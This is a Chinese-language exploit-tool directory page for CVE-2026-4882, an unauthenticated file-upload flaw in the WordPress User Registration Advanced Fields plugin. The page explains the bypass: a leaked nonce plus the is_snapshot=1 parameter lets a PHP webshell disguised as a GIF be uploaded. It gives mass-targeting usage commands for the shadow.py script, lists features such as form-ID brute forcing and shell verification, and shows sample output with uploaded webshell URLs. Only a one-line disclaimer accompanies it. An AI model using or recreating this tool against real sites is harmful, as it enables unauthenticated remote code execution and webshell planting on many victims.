Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-4882 — User Registration Advanced Fields <= 1.6.20 - 未经认证的任意文件上传 | Kitploit
工具/GitHubGitHub/xshadow-here/cve-2026-4882
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试红队
GitHubxshadow-here/cve-2026-4882

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - 未经认证的任意文件上传

查看仓库
13个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - 未认证任意文件上传

描述:

User Registration Advanced Fields <= 1.6.20 - 未认证任意文件上传 描述 WordPress 的 User Registration Advanced Fields 插件(版本至 1.6.20 及以下)存在未认证任意文件上传漏洞,攻击者可借助 uraf_profile_picture_upload_method_upload AJAX 操作进行利用。该插件在任何包含注册表单的页面上通过 wp_localize_script() 泄漏有效的 nonce,并且使用 is_snapshot=1 参数可以完全绕过文件扩展名验证。这使得未认证攻击者能够上传任意文件(例如伪装成 GIF 图片的 PHP WebShell),这些文件存储在 wp-content/uploads/user_registration_uploads/temp-uploads/ 中,从而导致完全远程代码执行(RCE)。

信息:CVE-2026-4882

~ CVSS 评分:9.8(严重)

~ 受影响版本:<= 1.6.20

  • 研究人员:0xd4rk5id3 - EnvoraSec

用法:

单个目标:

  • python3 shadow.py -u https://target.com -s shadow.php

批量目标:

  • python3 shadow.py -f targets.txt -s shadow.php -t 30

交互模式:

  • python3 shadow.py
  • 输入目标文件名
  • 输入线程数 1-50(最大)

功能:

  • 多线程
  • 错误处理
  • 自动 Nonce + 表单 ID 发现
  • 首页与站点地图爬取(自定义注册路径)
  • 表单 ID 暴力破解回退
  • 自动 HTTP/HTTPS 重定向解析
  • GIF89a Polyglot Shell 上传
  • 验证 Shell
  • 自动保存结果到 shell.txt

输出:

root@kitploit:~

╔══════════════════════════════════════════════════╗
║   CVE-2026-4882 — Full Auto Exploit              ║
║   User Registration Advanced Fields <= 1.6.20    ║
║   by: Shadow x Friska 😈🔥                      ║
╚══════════════════════════════════════════════════╝

  ═══ Interactive Mode ═══

  📄 Target file (e.g. targets.txt): list.txt
  ⚡ Threads 1-50 (default 30): 30

  🎯 Targets : 75
  📁 Shell   : shadow.php
  ⚡ Threads : 30
  💣 Brute   : 1-500

  🩷 [3/75] http://target.com
     → http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  💀 [1/75] http://example.com — no nonce
  ❌ [4/75] http://example2.com — upload failed

免责声明:

本工具仅用于教育和安全测试目的。

未经授权使用你不拥有或无权限测试的系统是违法的。

下载工具